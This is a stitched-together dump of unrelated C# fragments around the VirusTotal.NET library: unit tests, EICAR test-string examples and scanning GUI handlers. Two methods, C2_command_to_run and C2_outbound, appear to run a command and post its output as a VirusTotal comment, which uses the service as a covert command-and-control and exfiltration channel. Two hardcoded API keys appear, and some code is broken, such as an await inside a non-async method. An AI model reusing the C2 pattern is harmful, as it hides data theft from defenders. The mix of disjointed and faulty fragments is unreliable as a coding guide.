public async Task GetIPReportUnknownIPv4() { //Unknown hosts do not have all this in the response IgnoreMissingJson(" / as_owner", " / ASN", " / Country", " / detected_communicating_samples", " / detected_downloaded_samples", " / detected_referrer_samples", " / detected_urls", " / Resolutions", " / undetected_communicating_samples", " / undetected_downloaded_samples", " / undetected_referrer_samples"); IPReport report = await VirusTotal.GetIPReportAsync("128.168.238.14"); Assert.Equal(IPReportResponseCode.NotPresent, report.ResponseCode); }
public async Task UrlScanBatchLimit() { VirusTotal.RestrictNumberOfResources = false; IEnumerable <UrlScanResult> results = await VirusTotal.ScanUrlsAsync(TestData.GetUnknownUrls(50)); //We only expect 25 as VT simply returns 25 results no matter the batch size. Assert.Equal(VirusTotal.UrlScanBatchSizeLimit, results.Count()); }
public async Task RescanUnknownFile() { IgnoreMissingJson(" / Permalink", " / scan_id", " / SHA256"); RescanResult fileResult = await VirusTotal.RescanFileAsync(TestData.GetRandomSHA1s(1).First()); //It should not be in the VirusTotal database already, which means it should return error. Assert.Equal(RescanResponseCode.ResourceNotFound, fileResult.ResponseCode); }
public async Task GetDomainReportUnknownDomain() { //Reports don't contain all these fields when it is unknown IgnoreMissingJson(" / Alexa category", " / Alexa domain info", " / Alexa rank", " / BitDefender category", " / BitDefender domain info", " / Categories", " / detected_communicating_samples", " / detected_downloaded_samples", " / detected_referrer_samples", " / detected_urls", " / domain_siblings", " / Dr.Web category", " / Forcepoint ThreatSeeker category", " / Opera domain info", " / Pcaps", " / Resolutions", " / subdomains", " / TrendMicro category", " / undetected_communicating_samples", " / undetected_downloaded_samples", " / undetected_referrer_samples", " / Websense ThreatSeeker category", " / Webutation domain info", " / whois", " / whois_timestamp", " / WOT domain info"); DomainReport report = await VirusTotal.GetDomainReportAsync(TestData.GetUnknownDomains(1).First()); Assert.Equal(DomainResponseCode.NotPresent, report.ResponseCode); }
public async Task ScanMultipleUnknownUrl() { IEnumerable <UrlScanResult> urlScans = await VirusTotal.ScanUrlsAsync(TestData.GetUnknownUrls(5)); foreach (UrlScanResult urlScan in urlScans) { Assert.Equal(UrlScanResponseCode.Queued, urlScan.ResponseCode); } }
public async Task RescanMultipleKnownFile() { IEnumerable <RescanResult> fileResult = await VirusTotal.RescanFilesAsync(TestData.KnownHashes); foreach (RescanResult rescanResult in fileResult) { //It should always be in the VirusTotal database. We expect it to rescan it Assert.Equal(RescanResponseCode.Queued, rescanResult.ResponseCode); } }
public async Task GetReportForUnknownFile() { //Reports for unknown files do not have these fields IgnoreMissingJson(" / MD5", " / Permalink", " / Positives", " / scan_date", " / scan_id", " / Scans", " / SHA1", " / SHA256", " / Total"); FileReport fileReport = await VirusTotal.GetFileReportAsync(TestData.GetRandomSHA1s(1).First()); //It should not be in the VirusTotal database already, which means it should return error. Assert.Equal(FileReportResponseCode.NotPresent, fileReport.ResponseCode); }
public async Task GetReportForUnknownUrlAndScan() { UrlReport urlReport = await VirusTotal.GetUrlReport("VirusTotal.NET" + Guid.NewGuid() + ".com", true); //It return "present" because we told it to scan it Assert.Equal(ReportResponseCode.Present, urlReport.ResponseCode); //We are supposed to have a scan id because we scanned it Assert.False(string.IsNullOrWhiteSpace(urlReport.ScanId)); }
public static FileReport UploadToVirusTotal(string APIKEY) { VirusTotal virusTotal = new VirusTotal(APIKEY); virusTotal.UseTLS = true; byte[] eicar = Encoding.ASCII.GetBytes(@"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"); FileReport report = await virusTotal.GetFileReportAsync(eicar); return(report); }
public async Task CreateDuplicateComment() { //Create the comment. This might fail with an error, but it does not matter. await VirusTotal.CreateCommentAsync(TestData.TestHash, "VirusTotal.NET test"); CreateCommentResult comment = await VirusTotal.CreateCommentAsync(TestData.TestHash, "VirusTotal.NET test"); Assert.Equal(CommentResponseCode.Error, comment.ResponseCode); Assert.Equal("Duplicate comment", comment.VerboseMsg); }
public async Task GetReportForKnownFile() { //Create a hash of the EICAR test virus. See http://www.eicar.org/86-0-Intended-use.html string hash = HashHelper.GetMD5(@"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"); FileReport fileReport = await VirusTotal.GetFileReport(hash); //It should always be in the VirusTotal database. Assert.Equal(ReportResponseCode.Present, fileReport.ResponseCode); }
public async Task C2_command_to_run(string api_key, string sha1, string process_filename, string process_command) { VirusTotal virusTotal = new VirusTotal(sha1); virusTotal.UseTLS = true; string run = Perform_C2(process_filename, process_command); await C2_outbound(api_key, sha1, run); }
public async Task GetMultipleReportForKnownFiles() { IEnumerable <FileReport> results = await VirusTotal.GetFileReportsAsync(TestData.KnownHashes); foreach (FileReport fileReport in results) { //It should always be in the VirusTotal database. Assert.Equal(FileReportResponseCode.Present, fileReport.ResponseCode); } }
//FileInfo fileInfo = new FileInfo("C:\\Users\\Antonio\\Documents\\file.txt"); public List <VirusTotalAux> send() { _virusTotal = new VirusTotal(ConfigurationManager.AppSettings["ApiKey"]); _listaScan.Clear(); _listaResultados.Clear(); int count = 0; while (count < 2) { string ruta = _lista[count].Proceso; ruta = ruta.Replace(@"\", @"\\"); FileInfo fileInfo = new FileInfo(ruta); _virusTotal.UseTLS = true; FileReport fileReport = _virusTotal.GetFileReport(fileInfo); bool hasFileBeenScannedBefore = fileReport.ResponseCode == ReportResponseCode.Present; if (hasFileBeenScannedBefore) { VirusTotalAux aux = new VirusTotalAux { Nombre = fileInfo.Name, Mensaje = fileReport.VerboseMsg, Positivos = fileReport.Positives.ToString() + "/" + fileReport.Total.ToString(), ScanDate = fileReport.ScanDate.ToString() }; foreach (ScanEngine scan in fileReport.Scans) { VirusTotalResultAux aux2 = new VirusTotalResultAux { Antivirus = scan.Name, Infectado = scan.Detected, Virus = scan.Result }; _listaResultados.Add(aux2); } aux.resultados = _listaResultados; _listaScan.Add(aux); //PrintScan(fileReport); } else { ScanResult fileResult = _virusTotal.ScanFile(fileInfo); VirusTotalAux aux = new VirusTotalAux { Mensaje = fileResult.VerboseMsg }; aux.resultados = _listaResultados; //Console.WriteLine(fileResult.VerboseMsg); //PrintScan(fileResult); } count++; } return(_listaScan); }
public async Task RescanBatchLimit() { IgnoreMissingJson("[array] / Permalink", "[array] / scan_id", "[array] / SHA256"); VirusTotal.RestrictNumberOfResources = false; IEnumerable <RescanResult> results = await VirusTotal.RescanFilesAsync(TestData.GetRandomSHA1s(50)); //We only expect 25 as VT simply returns 25 results no matter the batch size. Assert.Equal(VirusTotal.RescanBatchSizeLimit, results.Count()); }
public async Task RescanLargeFile() { IgnoreMissingJson(" / Permalink", " / scan_id", " / SHA256"); //Since rescan works on hashes, we expect the hash of this empty file (which is larger than the limit) is not present in the database. byte[] bytes = new byte[99 * 1023 * 1024]; //the weird size is because VT has some weird empty files in its database. string hash = HashHelper.GetMD5(bytes); RescanResult result = await VirusTotal.RescanFile(hash); Assert.Equal(ScanResponseCode.Error, result.ResponseCode); }
public async Task ScanMultipleUnknownUrl() { string[] urls = { "VirusTotal.NET" + Guid.NewGuid() + ".com", "VirusTotal.NET" + Guid.NewGuid() + ".com", "VirusTotal.NET" + Guid.NewGuid() + ".com", "VirusTotal.NET" + Guid.NewGuid() + ".com", "VirusTotal.NET" + Guid.NewGuid() + ".com" }; List <UrlScanResult> urlScans = await VirusTotal.ScanUrls(urls); foreach (UrlScanResult urlScan in urlScans) { Assert.Equal(ScanResponseCode.Queued, urlScan.ResponseCode); } }
public async Task GetMultipleReportUnknownUrl() { string[] urls = { "VirusTotal.NET" + Guid.NewGuid() + ".com", "VirusTotal.NET" + Guid.NewGuid() + ".com", "VirusTotal.NET" + Guid.NewGuid() + ".com" }; List <UrlReport> urlReports = await VirusTotal.GetUrlReports(urls); foreach (UrlReport urlReport in urlReports) { Assert.Equal(ReportResponseCode.NotPresent, urlReport.ResponseCode); } }
public async Task C2_outbound(string api_key, string sha1, string upload_to_vt) { VirusTotal virusTotal = new VirusTotal(api_key); virusTotal.UseTLS = true; CreateCommentResult comment = await virusTotal.CreateCommentAsync(sha1, upload_to_vt); Assert.Equal(CommentResponseCode.Error, comment.ResponseCode); }
public async Task GetReportUnknownUrl() { IgnoreMissingJson(" / filescan_id", " / Permalink", " / Positives", " / scan_date", " / scan_id", " / Scans", " / Total", " / URL"); UrlReport urlReport = await VirusTotal.GetUrlReportAsync(TestData.GetUnknownUrls(1).First()); Assert.Equal(UrlReportResponseCode.NotPresent, urlReport.ResponseCode); //We are not supposed to have a scan id Assert.True(string.IsNullOrWhiteSpace(urlReport.ScanId)); }
public async Task UrlReportBatchLimit() { IgnoreMissingJson("[array] / filescan_id", "[array] / Permalink", "[array] / Positives", "[array] / scan_date", "[array] / scan_id", "[array] / Scans", "[array] / Total", "[array] / URL"); VirusTotal.RestrictNumberOfResources = false; IEnumerable <UrlReport> results = await VirusTotal.GetUrlReportsAsync(TestData.GetUnknownUrls(5)); //We only expect 4 as VT simply returns 4 results no matter the batch size. Assert.Equal(VirusTotal.UrlReportBatchSizeLimit, results.Count()); }
public async Task GetMultipleReportUnknownUrl() { IgnoreMissingJson("[array] / filescan_id", "[array] / Permalink", "[array] / Positives", "[array] / scan_date", "[array] / scan_id", "[array] / Scans", "[array] / Total", "[array] / URL"); IEnumerable <UrlReport> urlReports = await VirusTotal.GetUrlReportsAsync(TestData.GetUnknownUrls(4)); foreach (UrlReport urlReport in urlReports) { Assert.Equal(UrlReportResponseCode.NotPresent, urlReport.ResponseCode); } }
public async Task GetMultipleReportKnownUrl() { IgnoreMissingJson("[array].scans.ADMINUSLabs / Detail", "[array].scans.AlienVault / Detail", "[array].scans.Antiy-AVL / Detail", "[array].scans.AutoShun / Detail", "[array].scans.Avira / Detail", "[array].scans.Baidu-International / Detail", "[array].scans.BitDefender / Detail", "[array].scans.Blueliv / Detail", "[array].scans.Certly / Detail", "[array].scans.C-SIRT / Detail", "[array].scans.CyberCrime / Detail", "[array].scans.Emsisoft / Detail", "[array].scans.ESET / Detail", "[array].scans.Fortinet / Detail", "[array].scans.FraudScore / Detail", "[array].scans.FraudSense / Detail", "[array].scans.G-Data / Detail", "[array].scans.K7AntiVirus / Detail", "[array].scans.Kaspersky / Detail", "[array].scans.Malekal / Detail", "[array].scans.Malwared / Detail", "[array].scans.MalwarePatrol / Detail", "[array].scans.Netcraft / Detail", "[array].scans.Nucleon / Detail", "[array].scans.OpenPhish / Detail", "[array].scans.Opera / Detail", "[array].scans.ParetoLogic / Detail", "[array].scans.PhishLabs / Detail", "[array].scans.Phishtank / Detail", "[array].scans.Quttera / Detail", "[array].scans.Rising / Detail", "[array].scans.SecureBrain / Detail", "[array].scans.securolytics / Detail", "[array].scans.Sophos / Detail", "[array].scans.Spam404 / Detail", "[array].scans.StopBadware / Detail", "[array].scans.Tencent / Detail", "[array].scans.ThreatHive / Detail", "[array].scans.Trustwave / Detail", "[array].scans.URLQuery / Detail", "[array].scans.Webutation / Detail", "[array].scans.ZCloudsec / Detail", "[array].scans.ZeroCERT / Detail", "[array].scans.Zerofox / Detail", "[array].scans.zvelo / Detail", "[array].scans['AegisLab WebGuard'] / Detail", "[array].scans['CLEAN MX'] / Detail", "[array].scans['Comodo Site Inspector'] / Detail", "[array].scans['desenmascara.me'] / Detail", "[array].scans['Dr.Web'] / Detail", "[array].scans['Forcepoint ThreatSeeker'] / Detail", "[array].scans['Google Safebrowsing'] / Detail", "[array].scans['Malware Domain Blocklist'] / Detail", "[array].scans['Malwarebytes hpHosts'] / Detail", "[array].scans['malwares.com URL checker'] / Detail", "[array].scans['SCUMWARE.org'] / Detail", "[array].scans['Sucuri SiteCheck'] / Detail", "[array].scans['Virusdie External Site Scan'] / Detail", "[array].scans['VX Vault'] / Detail", "[array].scans['Web Security Guard'] / Detail", "[array].scans['ZDB Zeus'] / Detail"); IEnumerable <UrlReport> urlReports = await VirusTotal.GetUrlReportsAsync(TestData.KnownUrls); foreach (UrlReport urlReport in urlReports) { Assert.Equal(UrlReportResponseCode.Present, urlReport.ResponseCode); } }
public async Task ScanMultipleKnownUrls() { string[] urls = { "google.se", "http://google.com", "https://virustotal.com" }; List <UrlScanResult> urlScans = await VirusTotal.ScanUrls(urls); foreach (UrlScanResult urlScan in urlScans) { Assert.Equal(ScanResponseCode.Queued, urlScan.ResponseCode); } }
public async Task GetMultipleReportKnownUrl() { string[] urls = { "google.se", "http://google.com", "https://virustotal.com" }; List <UrlReport> urlReports = await VirusTotal.GetUrlReports(urls); foreach (UrlReport urlReport in urlReports) { Assert.Equal(ReportResponseCode.Present, urlReport.ResponseCode); } }
public async Task FileReportBatchLimit() { IgnoreMissingJson("[array] / MD5", "[array] / Permalink", "[array] / Positives", "[array] / scan_date", "[array] / scan_id", "[array] / Scans", "[array] / SHA1", "[array] / SHA256", "[array] / Total"); VirusTotal.RestrictNumberOfResources = false; IEnumerable <FileReport> results = await VirusTotal.GetFileReportsAsync(TestData.GetRandomSHA1s(10)); //We only expect 4 as VT simply returns 4 results no matter the batch size. Assert.Equal(VirusTotal.FileReportBatchSizeLimit, results.Count()); }
public async void GetReportForRecentFile() { //We ignore these fields due to unknown file IgnoreMissingJson(" / MD5", " / Permalink", " / Positives", " / scan_date", " / Scans", " / SHA1", " / SHA256", " / Total"); ScanResult result = await VirusTotal.ScanFileAsync(TestData.GetRandomFile(128, 1).First(), TestData.TestFileName); FileReport fileReport = await VirusTotal.GetFileReportAsync(result.ScanId); Assert.Equal(FileReportResponseCode.Queued, fileReport.ResponseCode); }
public async Task GetReportForUnknownUrlAndScan() { IgnoreMissingJson(" / filescan_id", " / Positives", " / Scans", " / Total"); UrlReport urlReport = await VirusTotal.GetUrlReportAsync(TestData.GetUnknownUrls(1).First(), true); //It return "present" because we told it to scan it Assert.Equal(UrlReportResponseCode.Present, urlReport.ResponseCode); //We are supposed to have a scan id because we scanned it Assert.False(string.IsNullOrWhiteSpace(urlReport.ScanId)); }
protected TestBase() { _ignoreMissingJson = new List<string>(); _ignoreMissingCSharp = new List<string>(); JsonSerializerSettings settings = new JsonSerializerSettings(); settings.MissingMemberHandling = MissingMemberHandling.Error; settings.ContractResolver = new FailingContractResolver(); settings.Error = Error; VirusTotal = new VirusTotal("YOUR API KEY HERE", settings); }
public VirusTotalHandle(string API_KEY, Action <HttpRequestMessage> sendHandler, Action <HttpResponseMessage> responseHandler, Action <byte[]> rawResponseHandler, bool useTLS) { handle = new VirusTotal(API_KEY); handle.UseTLS = useTLS; onRequestSending = sendHandler; onResponseRecieved = responseHandler; onRawResponseRecieved = rawResponseHandler; handle.OnHTTPRequestSending += onRequestSending; handle.OnHTTPResponseReceived += onResponseRecieved; handle.OnRawResponseReceived += onRawResponseRecieved; }
public async Task RescanKnownFile() { //Create the EICAR test virus. See http://www.eicar.org/86-0-Intended-use.html FileInfo fileInfo = new FileInfo("EICAR.txt"); File.WriteAllText(fileInfo.FullName, @"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"); RescanResult fileResult = await VirusTotal.RescanFile(fileInfo); //It should always be in the VirusTotal database. We expect it to rescan it Assert.Equal(ScanResponseCode.Queued, fileResult.ResponseCode); }
static void Main(string[] args) { VirusTotal virusTotal = new VirusTotal(ConfigurationManager.AppSettings["ApiKey"]); //Use HTTPS instead of HTTP virusTotal.UseTLS = true; //Create the EICAR test virus. See http://www.eicar.org/86-0-Intended-use.html FileInfo fileInfo = new FileInfo("EICAR.txt"); File.WriteAllText(fileInfo.FullName, @"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"); //Check if the file has been scanned before. FileReport fileReport = virusTotal.GetFileReport(fileInfo); bool hasFileBeenScannedBefore = fileReport.ResponseCode == ReportResponseCode.Present; Console.WriteLine("File has been scanned before: " + (hasFileBeenScannedBefore ? "Yes" : "No")); //If the file has been scanned before, the results are embedded inside the report. if (hasFileBeenScannedBefore) { PrintScan(fileReport); } else { ScanResult fileResult = virusTotal.ScanFile(fileInfo); PrintScan(fileResult); } Console.WriteLine(); UrlReport urlReport = virusTotal.GetUrlReport(ScanUrl); bool hasUrlBeenScannedBefore = urlReport.ResponseCode == ReportResponseCode.Present; Console.WriteLine("URL has been scanned before: " + (hasUrlBeenScannedBefore ? "Yes" : "No")); //If the url has been scanned before, the results are embedded inside the report. if (hasUrlBeenScannedBefore) { PrintScan(urlReport); } else { ScanResult urlResult = virusTotal.ScanUrl(ScanUrl); PrintScan(urlResult); } Console.WriteLine("Press a key to continue"); Console.ReadLine(); }
private static async Task RunExample() { VirusTotal virusTotal = new VirusTotal("YOUR API KEY HERE"); //Use HTTPS instead of HTTP virusTotal.UseTLS = true; //Create the EICAR test virus. See http://www.eicar.org/86-0-Intended-use.html FileInfo fileInfo = new FileInfo("EICAR.txt"); File.WriteAllText(fileInfo.FullName, @"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"); //Check if the file has been scanned before. FileReport fileReport = await virusTotal.GetFileReport(fileInfo); bool hasFileBeenScannedBefore = fileReport.ResponseCode == ReportResponseCode.Present; Console.WriteLine("File has been scanned before: " + (hasFileBeenScannedBefore ? "Yes" : "No")); //If the file has been scanned before, the results are embedded inside the report. if (hasFileBeenScannedBefore) { PrintScan(fileReport); } else { ScanResult fileResult = await virusTotal.ScanFile(fileInfo); PrintScan(fileResult); } Console.WriteLine(); UrlReport urlReport = await virusTotal.GetUrlReport(ScanUrl); bool hasUrlBeenScannedBefore = urlReport.ResponseCode == ReportResponseCode.Present; Console.WriteLine("URL has been scanned before: " + (hasUrlBeenScannedBefore ? "Yes" : "No")); //If the url has been scanned before, the results are embedded inside the report. if (hasUrlBeenScannedBefore) { PrintScan(urlReport); } else { UrlScanResult urlResult = await virusTotal.ScanUrl(ScanUrl); PrintScan(urlResult); } }
private void iTalk_Button_22_Click(object sender, EventArgs e) { // initializing VT with API key VirusTotal VT = new VirusTotal("c9836f1fb3196ec1205c4eb4f58cc50be1b41915f2b18633927e8a7333457cc8"); // Yes we want to use HTTPS instead of HTTP VT.UseTLS = true; // Getting our file FileInfo fileInfo = new FileInfo("asdf.txt"/*iTalk_TextBox_Small2.Text*/); //debug purpose File.WriteAllText(fileInfo.FullName, @"purpletestfislekkkk"); // Getting our fileReport FileReport fileReport = VT.GetFileReport(fileInfo); // Checking weather or not there is a previous scan on the file bool prevScan = fileReport.ResponseCode == ReportResponseCode.Present; // If there was a previous scan or if prevScan = true ( its a bool ) // Update our label to let the users know there is a pervious scan // else // We want to upload the file and get the scan report // ( this is where PrintScan(ScanResult scanresult) comes into play ) if (prevScan) { PrintScan(fileReport); iTalk_Label7.Text = "YES"; iTalk_Label7.ForeColor = Color.Green; } else { ScanResult fileReport2 = VT.ScanFile(fileInfo); PrintScan(fileReport2); iTalk_Label7.Text = "NO"; iTalk_Label7.ForeColor = Color.Red; } }
public static void scanFile(string fnPath, ScannedFileItem _scannedFile) { try { if (File.Exists(fnPath)) { _scanW.WorkerReportsProgress = true; _scanW.WorkerSupportsCancellation = true; _scanW.RunWorkerAsync(); _scanW.DoWork += (o, e) => { var virusTotal = new VirusTotal(apiKey); virusTotal.UseTLS = true; var fInfo = new FileInfo(fnPath); _report = new FileReport(); var fReport = virusTotal.GetFileReport(fInfo); _report = fReport; bool hasFileBeenScannedBefore = fReport.ResponseCode == ReportResponseCode.Present; if (!hasFileBeenScannedBefore) { var fResult = virusTotal.ScanFile(fInfo); } }; _scanW.RunWorkerCompleted += (m, e) => { if (_report != null) { var scanWin = new ScanResultWin(); scanWin.init(_report, _scannedFile); scanWin.ShowDialog(); } }; } } catch (Exception ex) { GeneralSettings.LogException(ex); } }
public static void Initialize(TestContext context) { _virusTotal = new VirusTotal(ConfigurationManager.AppSettings["ApiKey"]); }
public void UnauthorizedScan() { VirusTotal virusTotal = new VirusTotal("xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"); //64 characters virusTotal.GetFileReport("ca6d91bad9d5d5698c92dc64295a15a6"); //conficker MD5 hash }
public async Task UnauthorizedScan() { VirusTotal virusTotal = new VirusTotal("xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"); //64 characters await Assert.ThrowsAsync<AccessDeniedException>(async () => await virusTotal.GetFileReport("ca6d91bad9d5d5698c92dc64295a15a6")); //conficker MD5 hash }
private static void VirusScanFile(string filePath) { VirusTotal virusTotal = new VirusTotal("555e487a82c5885d48c50f33037393f2f3140db9f5e0b256eb30e5654f601486"); virusTotal.UseTLS = true; FileInfo fileInfo = new FileInfo(filePath); if (!fileInfo.Exists) return; //Check if the file has been scanned before. Debug.WriteLine("Getting report for " + Path.GetFileName(filePath)); Report report = virusTotal.GetFileReport(fileInfo); if (report == null || report.ResponseCode == 0) { Debug.WriteLine("No report for " + Path.GetFileName(filePath) + " - sending file to VT"); try { ScanResult result = virusTotal.ScanFile(fileInfo); Debug.WriteLine("Opening report for " + Path.GetFileName(filePath)); Process.Start(result.Permalink); } catch (RateLimitException) { MessageBox.Show("Virus Total limits the number of calls you can make to 4 calls each 60 seconds.", "Rate limit"); } catch (SizeLimitException) { MessageBox.Show("Virus Total limits the filesize to 32 MB.", "File too large"); } } else { Debug.WriteLine("Opening report for " + Path.GetFileName(filePath)); Process.Start(report.Permalink); } }